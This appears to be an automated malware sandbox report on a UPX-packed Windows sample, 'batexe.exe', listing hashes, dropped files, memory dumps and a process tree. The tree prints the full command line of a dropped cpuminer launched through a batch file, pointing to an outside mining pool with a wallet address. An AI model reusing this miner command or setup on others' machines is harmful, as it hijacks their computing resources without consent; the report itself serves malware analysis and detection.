73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
292s
max time network
301s
platform
windows10-1703_x64
resource
win10-20231220-ja
resource tags

arch:x64arch:x86image:win10-20231220-jalocale:ja-jpos:windows10-1703-x64systemwindows
submitted
12/02/2024, 13:41

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
4928	b2e.exe
2424	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
2424	cpuminer-sse2.exe
2424	cpuminer-sse2.exe
2424	cpuminer-sse2.exe
2424	cpuminer-sse2.exe
2424	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/memory/1980-6-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1980 wrote to memory of 4928	1980	batexe.exe	75
PID 1980 wrote to memory of 4928	1980	batexe.exe	75
PID 1980 wrote to memory of 4928	1980	batexe.exe	75
PID 4928 wrote to memory of 3376	4928	b2e.exe	76
PID 4928 wrote to memory of 3376	4928	b2e.exe	76
PID 4928 wrote to memory of 3376	4928	b2e.exe	76
PID 3376 wrote to memory of 2424	3376	cmd.exe	79
PID 3376 wrote to memory of 2424	3376	cmd.exe	79

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1980
- C:\Users\Admin\AppData\Local\Temp\98D5.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\98D5.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\98D5.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9AF8.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3376
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2424

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\98D5.tmp\b2e.exe

Filesize
2.3MB

MD5
14adfb9f84b2cf9b1b03d5a1bedb2c77

SHA1
5d0cb7299069fdcac96da52ba1ceb8e1304a9b9c

SHA256
abc6b681507e9a52321f2c58efd83c79070a92c101d3380ef61430ccd0d50d4a

SHA512
4f64329ac84687809d2f3eb384a24ed6c496f7c632fa5f284be6cdc97c8229a0b0d7660a07810731ad315f59838dd959595b8545ffa4a941659956dedb224e8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\98D5.tmp\b2e.exe

Filesize
2.4MB

MD5
b255336c80a95e613c2c136ed1159e3c

SHA1
789f020cd3f5d3b45801b2eecebecdb896ae4df2

SHA256
22128ad26286151cbe551623bd42ab354ac464451c2bb270d2dc8ee92fb92c8a

SHA512
e8d3a0b7b9f9a3387541e39e8779ca750277ef91c57171bb8a2e1bc69c3d4e9c90b5d34f8a5f06085ec78b53279a16d7284e6c4dd7da6fc284907a9548008db7

Download Submit
C:\Users\Admin\AppData\Local\Temp\9AF8.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
590KB

MD5
9c426538d10aac5b13c574efd690eef1

SHA1
39826c607c72d250a3814fb2110a5441fa8560a0

SHA256
fc9dfe31d24c0b2e96cfff27ea7ce2d6120a52fa009b0ad9b0bbd5b339652c96

SHA512
161685204433938d8c949fd8e70c92e5c13c68242d34561b8b835ab6e8ffb9404b01ffe5d6903ec7086aa3974ff9d0ae2ca8756640b6dd0690e2ca5d7f5ea35b

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
533KB

MD5
154b764e555eed85471d6abe716245eb

SHA1
8f5fbb6337b329ebe5b0ac208531bfd40fc05034

SHA256
420d270a344881768447b5c3ebd18183cdcea0c4e5697d8fc1f8b2dc34178aa3

SHA512
3a399925166e5b42d6729b4f8e27be26ffa206f90d0d297df3d03c9f83f227ee194658a898b9fd3807b6cf68105f31dd8a6dfb9153d859092e50bb9d681054b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
375KB

MD5
5e33d081de24dbf689304e2ff2f7d8a8

SHA1
0fb56b175937226e74204a02dcc2db07cf8c4f3e

SHA256
89e9b4ce5fe9158c28be9a3091ce45b651d6e6927fffff03b169274915878557

SHA512
5f4be230bbd6f2656869a42ac55c2b3ef98b2e4d6dd8f96ef96c93b4d3de4a94f9f7cf4da80bfe44d00eb0afac545042b707bf29f9f72efd85bc363e68db5f10

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
218KB

MD5
c118880855089c950298ce4bf86ec413

SHA1
6e2a83ba5b64a8c768432278f5e2f0eb36ede600

SHA256
0ae07229cf6dc2bc88ae54c2f98c7f2a6fe094f6df73d3df3fa326177cfc96db

SHA512
7848b8c40c260f2dd6a4316b0007399ab1bfde41556d163d9c6ef2f8636e7247e8ab57150b212dffed064ff145fa4b0d142e7c6327bffd438dcfb43d6609bac6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
576KB

MD5
13746f79a51eb8ce3107de99ffc6b56a

SHA1
64a00c99a805f8775f08cda4e4d06e1150195347

SHA256
2c04d5960f13e859d49c78a8858bdcb0c53914306eba52746105a76d98f5d205

SHA512
d0e69c6cf0078c858e8258a4038098e644d611b544b6588b2b1c9d2d2937ade0472edc96257545f5935514bfa18970f5762eb393def612c5a7027727397ca8d7

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
147KB

MD5
0c4c3f093d6959662b15e51e71572467

SHA1
a11c564bb7497f69875302bdf238a228018d9b6d

SHA256
af865d13f15f2f1b7ddc332ddee786b95d51eeee691fe2ac0ddb128499d34852

SHA512
50094ab42556b610a72761f8ae9f803e43abd21e5ca95bad9920d500aed210d1368cfa446ed774f159bcac8994f75cd69312922824e5a6a7901941cf4171c3e4

Download Submit
\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
413KB

MD5
e2733ecd77f8096d336f44b36cd7c742

SHA1
bd2bce3fa52f22691693b7628c17c902dca90f72

SHA256
b226e669e9e77d9bf3c3574bf650a6d1571954af19d0adeafaff51d162a41328

SHA512
3118b626ef4773e9b881792bebf4a757a8ed4cf3e700183cb072bc6655ef57afe1444cf3082211f5a7b0c48a4a8b2c20369db536b0d50073aa810271daa3c14e

Download Submit
\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
383KB

MD5
8995e21bee52c12d3f753737898d9449

SHA1
8e1bd4ac512f4a45f2a2029bb1a7b5da75106f5b

SHA256
bf7b3e27b391c79b5d82adddea9e6c65336df634f1f82a037ab9ac54b259b52a

SHA512
088ff15c1e1834f88d60e41f8cc5add33f09a355da05ab3071f38163c944f084afcbe816d8e748f0f10d6842e9ce7ee6c3426220c0a1f3b099da4c124afe5318

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
419KB

MD5
d490a8d52e77682950fa5e912dc54e5f

SHA1
b7eedcbcf81f0ee215a6a7236f8a4af4472dae9b

SHA256
9ac0ffe0b172625ffa300a62d26d05e623e56c312742805a2442caa93dd13b66

SHA512
b008a2627f92285d80a0936b59efb02288c1fe70afd8369373fef3fb47af9b57515ef82672b116daae7e9d52c7ee3b13a8a6146a3c95837d7cf223cad17ba13e

Download Submit
\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
292KB

MD5
4e87ce8e0c66b86511bc62e839473141

SHA1
fe64f1cf21c98bbcc40a01e01d41cd775eb0b558

SHA256
83aef8ed9187d5a81c6ae56b89cacb777f065201382281b32bd5d367f1657d65

SHA512
6cf27dcb43af152a854e44be814a58848899a4b01f19bde2cb4a5e8f2276fca1dfd84ccfe3a7ccd8d39e0da16e1b91349e6495d27b1f595530a3aee80bafd458

Download Submit
\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
174KB

MD5
8fc765518f66b5223da321a58124bf6c

SHA1
dec6a2f3be791060a6f7b3201ba20ac19e75336b

SHA256
8a05f668f62cd5e964e7e3c4e69a031d44940ef2fe7a8a7257e00ca346b58b46

SHA512
00cbdfdbe98f48220445e03bb8dbaac79522d689f69bc097782c48ec5c1718f01002a5397ec7fab2a9ca859b155201ea9d749738ffc60b7d577b72cfe9527ab7

Download Submit
memory/1980-6-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/2424-42-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/2424-61-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-43-0x00000000536F0000-0x0000000053788000-memory.dmp

Filesize
608KB

Download
memory/2424-41-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/2424-40-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-44-0x0000000000E50000-0x0000000002705000-memory.dmp

Filesize
24.7MB

Download
memory/2424-45-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-101-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-56-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-91-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-66-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-71-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-76-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-81-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/2424-86-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4928-4-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4928-50-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download